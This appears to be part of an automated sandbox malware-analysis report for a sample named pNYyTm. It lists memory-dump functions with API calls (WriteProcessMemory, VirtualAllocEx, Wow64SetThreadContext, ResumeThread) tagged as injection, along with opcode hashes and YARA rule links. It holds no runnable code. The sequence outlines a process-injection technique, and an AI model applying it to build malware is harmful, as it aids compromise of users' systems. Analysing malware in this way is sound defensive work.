Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019C59C9

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d117a2b09e93f59899ad878a100eabbcc49bc05d6b687ef0c28f8820dd484faf
Instruction ID: 457d1f495edc30a063fefdb12bd86d3d823b0c31137864f8c80b9253e3bcdf74
Opcode Fuzzy Hash: d117a2b09e93f59899ad878a100eabbcc49bc05d6b687ef0c28f8820dd484faf
Instruction Fuzzy Hash: 3341F170D0071DCBEB24DFAAC884BDDBBB5BF49704F60845AD408AB251DBB16945CF91

Function 019C590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019C59C9

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c5f926e0a6e61a11432356b954a5ec61a7657d77ad29f2f5ded8de4309221b15
Instruction ID: 4a7056a197fffa4ef29f6f48168084a64bbadf6af1fcc7ef53118e23596af092
Opcode Fuzzy Hash: c5f926e0a6e61a11432356b954a5ec61a7657d77ad29f2f5ded8de4309221b15
Instruction Fuzzy Hash: F041F170D0071DCBEB24DFAAC884BDDBBB5BF49704F20805AD808AB251DBB56985CF91

Function 06443AB0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06443B48

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ae90f6aebf6ed97c2eb79d5d3a465f92ad58b401f2bb1cbcd33d7ef8c325c22a
Instruction ID: 9a1f60ffa8f2763c3310a167d583e068f61ffb1ed4f6311226cd23e1dd42ab4b
Opcode Fuzzy Hash: ae90f6aebf6ed97c2eb79d5d3a465f92ad58b401f2bb1cbcd33d7ef8c325c22a
Instruction Fuzzy Hash: 482125B19003499FDB10DFAAC881BDEBBF5FF48310F10842AE959A7241D779A955CBA0

Function 06443AB8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06443B48

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6819d11f21c6b9466ecf7a2eca2f6aa38c71a9080f7be206a2fd09ebeb7cb901
Instruction ID: f1e27f1fb4e2ff8305b320d1b542c7cecef263382f2ab27ffd8ed53304faca1a
Opcode Fuzzy Hash: 6819d11f21c6b9466ecf7a2eca2f6aa38c71a9080f7be206a2fd09ebeb7cb901
Instruction Fuzzy Hash: 3A212671D003499FDB10DFAAC881BDEBBF5FF48310F10842AE919A7241C7789955CBA4

Function 06443BA0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06443C28

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ef5091cea62e244927e32828a059c8244657bb8f8c337664220da5a864085a30
Instruction ID: cfd0428bac288298c6bf4e72e9daa25bad87af95d63c03bf1df783de9bd4a9f1
Opcode Fuzzy Hash: ef5091cea62e244927e32828a059c8244657bb8f8c337664220da5a864085a30
Instruction Fuzzy Hash: 7F211972C003599FDB10DFAAC8416DEFBF5FF48210F10882AD514A7250D7759945CB60

Function 06443919 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0644399E

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 74b9bfba0aba5a52bbd5e8e103c9c5821bfa6a267e42b425e074713d972d0ece
Instruction ID: 34822ffad91a052776142aea7c008dd5014c5e18a54aa63337c4fe63411ff29e
Opcode Fuzzy Hash: 74b9bfba0aba5a52bbd5e8e103c9c5821bfa6a267e42b425e074713d972d0ece
Instruction Fuzzy Hash: 20215971D003099FDB24DFAAC4857EEBBF5EF48214F14842AD859A7240CB78A945CFA1

Function 019CAF54 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CD50E,?,?,?,?,?), ref: 019CD5CF

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5d89b09dd541fc0ba95ae2f2fb12aa7e87693c546a07564823815acff706bc91
Instruction ID: 3c964a2b90254668510b569f31c0015075917e46c17fc21777b2c6b06985447c
Opcode Fuzzy Hash: 5d89b09dd541fc0ba95ae2f2fb12aa7e87693c546a07564823815acff706bc91
Instruction Fuzzy Hash: 9021E4B5900348AFDB10CF9AD584AEEFBF9EB48314F14842AE958A7310D374A954CFA5

Function 019CD540 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CD50E,?,?,?,?,?), ref: 019CD5CF

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 12a2dbb16ab91307f3f83c9e6679d029cb58f6b53533472ba2bacbb5557ccab8
Instruction ID: 2cae4d16b5d31c67605ccd2197d66b799e617e04f8cdffcc1c97adfaffa7ee97
Opcode Fuzzy Hash: 12a2dbb16ab91307f3f83c9e6679d029cb58f6b53533472ba2bacbb5557ccab8
Instruction Fuzzy Hash: F42103B5900348AFDB10CFAAD584BDEFFF8EB48310F14841AE958A7210D374AA50CFA5

Function 06443BA8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06443C28

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 88aacf546369d258c18af6752aef9c467c50f0fc7819128699d1b1626fcf7293
Instruction ID: 166e46aaa2150eedc66525dcca9a3d1dc891a09e898505905973ec395fea2396
Opcode Fuzzy Hash: 88aacf546369d258c18af6752aef9c467c50f0fc7819128699d1b1626fcf7293
Instruction Fuzzy Hash: 9D210772C003599FDB10DFAAC841BDEBBF5FF48310F10842AE519A7250C7789951CB60

Function 06443920 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0644399E

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 14d530ce90bbf5a94c96d135dc902de31547e6c4392cea3038fc20c3b2f9be07
Instruction ID: a96b02e3872a824b77ef92d08558560dd383fcc6e1d6ad014d08be34ead21d08
Opcode Fuzzy Hash: 14d530ce90bbf5a94c96d135dc902de31547e6c4392cea3038fc20c3b2f9be07
Instruction Fuzzy Hash: 36213871D003098FDB10DFAAC4857EEBBF5EF88214F14842AD459A7240CB789945CFA0

Function 064439F1 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06443A66

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1b6cee5b098595ad9e123f7046f04465ac59e1ca57bd57bc071d98ae24c8a7b6
Instruction ID: b7732f6b003cd6a1dc15e67713d5f5bf36bd3b4e739ffe7eb4480eb6c88d6443
Opcode Fuzzy Hash: 1b6cee5b098595ad9e123f7046f04465ac59e1ca57bd57bc071d98ae24c8a7b6
Instruction Fuzzy Hash: 2B1136769003099FDF20DFAAC845BDEBBF5EF48310F248419E955A7250C775A954CBA0

Function 019CAD88 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CB339,00000800,00000000,00000000), ref: 019CB54A

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f720b52d4e2d3c76d5843d9c613e9cf58c3c53a1953028a31666eb7895c6aafb
Instruction ID: f47f8b925aefb539b4737b9da94ccfe1973dd846904414c4023dda85c1b96926
Opcode Fuzzy Hash: f720b52d4e2d3c76d5843d9c613e9cf58c3c53a1953028a31666eb7895c6aafb
Instruction Fuzzy Hash: CD1144B69003488FDB20CF9AD445BEEFBF8EB48750F10842ED959A7200C374A945CFA5

Function 019CB4DB Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CB339,00000800,00000000,00000000), ref: 019CB54A

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9cda642aa5c7d155732801faac6f6153bf679e43450727a803f97b2c8ca3e45c
Instruction ID: c5324483c1c1941acef79b6c867406911b2701ae65c90efa69675b3148ff87f8
Opcode Fuzzy Hash: 9cda642aa5c7d155732801faac6f6153bf679e43450727a803f97b2c8ca3e45c
Instruction Fuzzy Hash: 3D1112B69003499FDB14CF9AD844BDEFBF8EB88710F14842ED969A7200C375A945CFA5

Function 06442FF8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06443062

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 29cf20d96df0a9715198fe09a0aaf7d70c68afb7494e0adc750f75ce5f86df7d
Instruction ID: 0808e5d3a7eee863723f56204a38956d10fa3eefc5b5567546d2630a7ac5a422
Opcode Fuzzy Hash: 29cf20d96df0a9715198fe09a0aaf7d70c68afb7494e0adc750f75ce5f86df7d
Instruction Fuzzy Hash: D9114971D003488FDB20DFAAC4457DEFBF5EF49310F24881AD415A7244C775A945CBA0

Function 064439F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06443A66

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4f4cd816e99ce9bc9e755021cdc67b7d86910a39f89072e650d53e843cf3d4b5
Instruction ID: 4b7b7e84b230c48ff620fcc6e2ac8cd6040dc63ec642a5e0b9e897edcdebd7a2
Opcode Fuzzy Hash: 4f4cd816e99ce9bc9e755021cdc67b7d86910a39f89072e650d53e843cf3d4b5
Instruction Fuzzy Hash: F71126729003499FDF20DFAAC845BEEBBF5EF48320F24841AE515A7250C775A950CBA0

Function 06443000 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06443062

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 15c3b04f93247fc5d89f35295dfa7732cdfeb9470201b93173ae99a5af9c66d6
Instruction ID: a1ee6bfe5dd99152cf4e616a14d855ec184c3e75f655992d2fa1c4417901e990
Opcode Fuzzy Hash: 15c3b04f93247fc5d89f35295dfa7732cdfeb9470201b93173ae99a5af9c66d6
Instruction Fuzzy Hash: 4B1166B1D003488FDB20DFAAC4457EEFBF5EF88220F24841AC419A7244CB79A944CBA0

Function 064471A0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06447205

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d58cc5afdee6e924c3eaffca8a3eb29d47bcab18d750e3823bec1d8dfe605afa
Instruction ID: 63960320caf6d3983c409b6f2fb0569dcde8d18943509518581ab13fe556b940
Opcode Fuzzy Hash: d58cc5afdee6e924c3eaffca8a3eb29d47bcab18d750e3823bec1d8dfe605afa
Instruction Fuzzy Hash: 6B11F5B68003499FDB20DF9AC485BDEFBF8FB48314F20881AE558A7210C375A545CFA5

Function 019CB258 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 019CB2BE

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0cfa7938e1118b09b6a5824bebaa8ece763c4322d0c6c1a09df2970e31f64ecd
Instruction ID: 17b4c78a3b3d8f501361b4f1d00d3654b0300d9973023dfedf8a01925f3b5878
Opcode Fuzzy Hash: 0cfa7938e1118b09b6a5824bebaa8ece763c4322d0c6c1a09df2970e31f64ecd
Instruction Fuzzy Hash: 02110FB6C003498FDB20CF9AC444BDEFBF9AB88314F10842AD869A7210C375A545CFA1

Function 06443DE8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06447205

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c81fbd72a3fce9ee2d672cecbb872b92456590565c886e6a43b5b8866781d7b2
Instruction ID: 6e46b848c3014ece6b42b113dc27b5bad6e521dccabb275eeb63005e6f9acbb9
Opcode Fuzzy Hash: c81fbd72a3fce9ee2d672cecbb872b92456590565c886e6a43b5b8866781d7b2
Instruction Fuzzy Hash: 6C11E3B58003499FDB10DF9AC445BDEBBF8FB48314F10841AE915A7300C375A944CFA1

Function 06458BE8 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

8, xrefs: 06458CB8

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 5e86d0208ccc74f4deeaa4ce0c6a192a91916a42dc46121bd778f9b723953909
Instruction ID: 5492dee09044a76b681ed33e1a0c7e341d2548eed79075541e024f65062a0573
Opcode Fuzzy Hash: 5e86d0208ccc74f4deeaa4ce0c6a192a91916a42dc46121bd778f9b723953909
Instruction Fuzzy Hash: 5E212970B103458FDB12EB38C45459FBBF6AF81210B0588AAE546DB355DF70EC05CB92

Function 064534B0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555d2bd4dc5af8f67bc455a0eb971cff391d09e8ca18bfe5da1ef5dbc217b46c
Instruction ID: c9e183be9c86fe1e54065d64a1dab4072ccffd31e74e1e21592b7c52dc4de6d1
Opcode Fuzzy Hash: 555d2bd4dc5af8f67bc455a0eb971cff391d09e8ca18bfe5da1ef5dbc217b46c
Instruction Fuzzy Hash: BE51E431B102068FDB11EB79D84896FBBF6FFC8220715896AE469D7391EF309D058751

Function 06453B69 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c5446d5194fc27e79b63f15965db52d4c65fb30d4f1ad669c89f2b00edbd40
Instruction ID: ddbc57ea0c330afb0fb3f4f25f8c16a2ab7a0d7f9762b339d24fb15b771f67d9
Opcode Fuzzy Hash: 73c5446d5194fc27e79b63f15965db52d4c65fb30d4f1ad669c89f2b00edbd40
Instruction Fuzzy Hash: FA513E75D19619DFDB82CFA8D4858FDBBB4BB4E280F025456EC16A7302E7309816CBA4

Function 06453B78 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e48f274db325d782fcde2c05fe7cc02d82cfc6e3297fee10ca02da2696cc2013
Instruction ID: 0e175c094cd420ac85a7b14e6f87009fb4e8445f5bfeeb66d93182f9a34f8e56
Opcode Fuzzy Hash: e48f274db325d782fcde2c05fe7cc02d82cfc6e3297fee10ca02da2696cc2013
Instruction Fuzzy Hash: 7A511F75D15619DFDB82CFA9D4848FDBBB4FB4D280F025456EC16A7302E7309816CBA4

Function 06458774 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020a8380a57ff2861354b756ea948a31635577c37cf1df6ce0903e42eb7a8f15
Instruction ID: e483a718e1c8a1ecb55f035895cc3ad23628d9be88e78a90154c8dc7a42159ff
Opcode Fuzzy Hash: 020a8380a57ff2861354b756ea948a31635577c37cf1df6ce0903e42eb7a8f15
Instruction Fuzzy Hash: 9A41AD71A143499FCB11DFAAD844ADEBFF5EF8A310F15842BE854E7211C734A945CBA0

Function 064546F1 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7b6364d588587b9510e2656499bc9c876acb12eae84f682f17a2989ed8360a
Instruction ID: a48d449e9a52d7f75f7fe0264cbc2136b635381bec6dc3321c10b5be8b61559e
Opcode Fuzzy Hash: 3d7b6364d588587b9510e2656499bc9c876acb12eae84f682f17a2989ed8360a
Instruction Fuzzy Hash: CC41E474D09318DFDF54DFA5D884AEDBBF5FB4A311F156016E80AAB252C7349982CB40

Function 06453A28 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6020a73b6682adc40c5e9f137a468f03d80261b632c83443cca0762c052be35b
Instruction ID: 73868559e5d3a89e7a6c58b9872066bf4275167502675565f979c2063f2addbb
Opcode Fuzzy Hash: 6020a73b6682adc40c5e9f137a468f03d80261b632c83443cca0762c052be35b
Instruction Fuzzy Hash: 2141B470E08615CFDB85CF56D4849BEBBF8BF8E340B42A496D8199B217EB30D812CB40

Function 06453A38 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d105a19771aaa7b42c776ecbe59b1c4c137becdf6813fcf7382e4ad73f8493e1
Instruction ID: 67656db1f89a8ec48426a6380dfeb50a7aec06ad76abb21c618455ce6a0a58b3
Opcode Fuzzy Hash: d105a19771aaa7b42c776ecbe59b1c4c137becdf6813fcf7382e4ad73f8493e1
Instruction Fuzzy Hash: 88417370E08615CFEB85DF96D4849BEBBF8FF8D340B42A496D4199B217EB709812CB40

Function 06457C94 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e81c7a360773bc2fed27daf5307e55be90aca7bfb3cb2e6fdf3ea9e3acb9622
Instruction ID: e4f73c0c889f37d45e482cb02d3b8fcc95bb940bf27ae21f83adb413850acaa3
Opcode Fuzzy Hash: 5e81c7a360773bc2fed27daf5307e55be90aca7bfb3cb2e6fdf3ea9e3acb9622
Instruction Fuzzy Hash: CD41E4B1D003199FDB14CF99C584ADDFBB5BF48304F65841AD808AB205DBB16946CF90

Function 0171D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1367020514.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_171d000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09503386bde65fb0d2f2df29a2c6eeb69f37c6b492cd1ee15d3090bb2389073f
Instruction ID: 401b5994ffc238117ab1a0d60b348da08db23c53a33e210fece0cdf48b11ef12
Opcode Fuzzy Hash: 09503386bde65fb0d2f2df29a2c6eeb69f37c6b492cd1ee15d3090bb2389073f
Instruction Fuzzy Hash: 362103B2504240DFDB25DF58D9C8B26FF65FB88318F34C5A9E9090B25AC336D456CEA2

Function 0172D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1367177898.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_172d000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dab8f47882bf0cc3f86444cfae60cde883d2f182e9bd2b61310be431960efa2
Instruction ID: 8a99f658b0d0f5603f423db2df7bef0bef11a24698ba63b6a997080c11f53947
Opcode Fuzzy Hash: 4dab8f47882bf0cc3f86444cfae60cde883d2f182e9bd2b61310be431960efa2
Instruction Fuzzy Hash: 482134B1508300EFDB25DF94C9C0B26FBA5FB89324F24C5ADE80A4B242C336D847CA61

Function 0172D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1367177898.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_172d000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47608a3214d9237f228d94d836682129e6f1a30da2ff2ddd425b91160a258b33
Instruction ID: c9c932d51d741819b94e723b70a23853c69e1758e1b58941e88a3f4934870b9b
Opcode Fuzzy Hash: 47608a3214d9237f228d94d836682129e6f1a30da2ff2ddd425b91160a258b33
Instruction Fuzzy Hash: 66212571604344DFDB35DF54D5C0B16FB61EB84314F24C5ADD90A0B266C33AD447CA61

Function 0645B480 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58532e6b16aa72b9a1475e34205617a4fa4b90e3d70af72ae94ca5f06b2448b9
Instruction ID: 777dc723b1a3fb78667b682337838eab5d0c9732075d44412456f9b96013d7dd
Opcode Fuzzy Hash: 58532e6b16aa72b9a1475e34205617a4fa4b90e3d70af72ae94ca5f06b2448b9
Instruction Fuzzy Hash: 2021D430A0934C9FD755DB68C824B6A7BBAEF86300F1680E7DA429B352CA359C458B91

Function 06459F50 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c40d7a95c27a8143ca3e834714336cb975513938a4041c195d31994f207a7ad
Instruction ID: c74dd1c00510d93b93c471cab165f0ca17d0372234cf2d170917af77e6b7a554
Opcode Fuzzy Hash: 5c40d7a95c27a8143ca3e834714336cb975513938a4041c195d31994f207a7ad
Instruction Fuzzy Hash: 60110E74B093C4AFDB86DB748C1556D7FF99E8600032548EFEC82C7283EA309D0A8321

Function 06455BB0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd

Similarity

API ID:
String ID:
API String ID:
